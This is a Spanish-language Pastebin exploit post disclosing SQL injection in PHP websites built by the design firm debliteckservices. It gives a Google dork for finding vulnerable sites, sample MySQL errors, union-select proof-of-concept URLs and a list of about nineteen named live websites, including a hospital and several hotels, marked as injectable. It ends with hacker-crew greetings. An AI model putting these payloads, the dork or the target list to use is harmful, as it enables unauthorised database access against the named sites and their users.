Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: debliteckservices / SQL Injection vulnerability
- # Date: 02/02/2013
- # Exploit Author: Diego_Asencio || r4z0r_bl4ck
- # Twitter: @r4z0r_bl4ck
- # Blog: http://r4z0rbl4ck.wordpress.com/
- # Vendor Homepage: http://www.debliteckservices.com/
- # Tested on: Windows Ultimate - Linux Ubuntu
- # Categoria: WebApps - PHP
- # Google Dork: inurl:gallery.php?id= intext:Debliteck
- # WorkGroup: @inside0utside
- -= INFORMACION =-
- La empresa debliteckservices dedicada al diseño y desarrollo web, dentro de su portafolio de trabajo contiene paginas web en lenguaje PHP con vulnerabilidad de SQL, la cual permite al atacante inyectar peticiones o consultas a la base de datos.
- -= MYSQL ERROR's =-
- 1) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' and state='ACTIVE' order by sort limit 0,12' at line 1
- 2) Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/h/o/domain/public_html/include/function.php on line 97
- 3) Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/x/y/domain/public_html/header.php on line 82
- 4) Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/n/o/domain/web/public_html/header.php on line 13
- -= XPL (PoC) =-
- http://127.0.0.1/gallery.php?id=1+union+all+select+0,1,2,3,4--
- http://127.0.0.1/section.php?id=1+union+all+select+0,1,2,3,4--
- http://127.0.0.1/article.php?id=1+union+all+select+0,1,2,3,4--
- -= DEMO's =-
- http://www.st-raphaelhospital.com/gallery.php?id=6' (SQLi)
- http://www.coralsearesorts.eu/gallery.php?id=15' (SQLi)
- http://www.nplanitis.com/gallery.php?id=8' (SQLi)
- http://www.camel-park.com/gallery.php?id=2' (SQLi)
- http://www.underseawalkers.com/gallery.php?id=1' (SQLi)
- http://www.bellsinn.com/gallery.php?id=2' (SQLi)
- http://www.olympicresidence.com/gallery.php?id=13' (SQLi)
- http://www.kanika-ibc.com/gallery.php?id=2' (SQLi)
- http://www.limocy.com/gallery.php?id=4' (SQLi)
- http://www.demetriseliaproperties.com/gallery.php?id=3' (SQLi)
- http://www.forcecars.com/gallery.php?id=1' (SQLi)
- http://www.newfamagustahotel.com/gallery.php?id=6' (SQLi)
- http://d-kombosdevelopers.com/gallery.php?id=7' (SQLi)
- http://xylophagou.com/gallery.php?id=3' (SQLi)
- http://www.easyriders.com.cy/gallery.php?id=3' (SQLi)
- http://www.agf.com.cy/gallery.php?id=1' (SQLi)
- http://www.nissi-beach.com/section.php?id=20' (SQLi)
- http://www.hotelsayianapa.com/section.php?id=7' (SQLi)
- http://www.nozomi.com.cy/article.php?id=45' (SQLi)
- #################################
- Agradecimientos a: @Sr_Xaoc
- @inside0utside - t34m /
- - all members
- @r4z0r_bl4ck
- @sr_xaoc
- @MaximusWell
- @MikeSoft
- -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement